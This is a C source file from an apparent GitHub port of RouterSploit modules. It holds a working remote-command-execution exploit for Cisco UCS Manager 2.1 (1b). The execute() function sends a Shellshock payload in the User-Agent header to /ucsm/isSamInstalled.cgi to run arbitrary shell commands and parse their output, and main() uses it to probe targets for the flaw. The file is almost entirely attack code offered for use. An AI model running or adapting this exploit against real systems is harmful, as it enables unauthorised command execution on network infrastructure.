RouterSploit-RCEs-on-C/UCS_Manager_RCE.c at main · ilnarildarovuch/RouterSploit-RCEs-on-C · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
// "Cisco UCS Manager 2.1 (1b)

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <arpa/inet.h>

#define MAX_RESPONSE_SIZE 8192

char *random_text(int length) {
    char *text = malloc(length + 1);
    const char charset[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
    for (int i = 0; i < length; i++) {
        text[i] = charset[rand() % (sizeof(charset) - 1)];
    }
    text[length] = '\0';
    return text;
}

char *execute(const char *target_ip, int port, const char *cmd) {
    int sock;
    struct sockaddr_in server_addr;
    char request[1024];
    char response[MAX_RESPONSE_SIZE];
    char *mark = random_text(32);
    int bytes_received;

    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("Socket creation failed");
        return NULL;
    }

    server_addr.sin_family = AF_INET;
    server_addr.sin_port = htons(port);
    inet_pton(AF_INET, target_ip, &server_addr.sin_addr);

    if (connect(sock, (struct sockaddr *)&server_addr, sizeof(server_addr)) < 0) {
        perror("Connection failed");
        close(sock);
        return NULL;
    }

    snprintf(request, sizeof(request),
             "GET /ucsm/isSamInstalled.cgi HTTP/1.1\r\n"
             "Host: %s\r\n"
             "User -Agent: () { test;};echo \"Content-type: text/plain\"; echo; echo; echo %s; echo \"$(%s)\"; echo %s;\r\n"
             "Connection: close\r\n\r\n",
             target_ip, mark, cmd, mark);

    send(sock, request, strlen(request), 0);

    memset(response, 0, sizeof(response));
    bytes_received = recv(sock, response, sizeof(response) - 1, 0);
    close(sock);

    if (bytes_received < 0) {
        perror("Receive failed");
        free(mark);
        return NULL;
    }

    response[bytes_received] = '\0';
    char *result = strstr(response, mark);
    free(mark);

    if (result) {
        char *start = result + strlen(mark);
        char *end = strstr(start, mark);
        if (end) {
            size_t length = end - start;
            char *output = malloc(length + 1);
            strncpy(output, start, length);
            output[length] = '\0';
            return output;
        }
    }
    return NULL;
}

int check(const char *target_ip, int port) {
    char *mark = random_text(32);
    char cmd[64];
    snprintf(cmd, sizeof(cmd), "echo %s", mark);
    char *response = execute(target_ip, port, cmd);
    int is_vulnerable = (response && strstr(response, mark) != NULL);
    free(response);
    free(mark);
    return is_vulnerable;
}

int main(int argc, char *argv[]) {
    if (argc < 3) {
        printf("Usage: %s <target_ip> <port>\n", argv[0]);
        return 1;
    }

    const char *target_ip = argv[1];
    int port = atoi(argv[2]);

    if (check(target_ip, port)) {
        printf("Target is vulnerable\n");
    } else {
        printf("Target is not vulnerable\n");
    }
    return 0;
}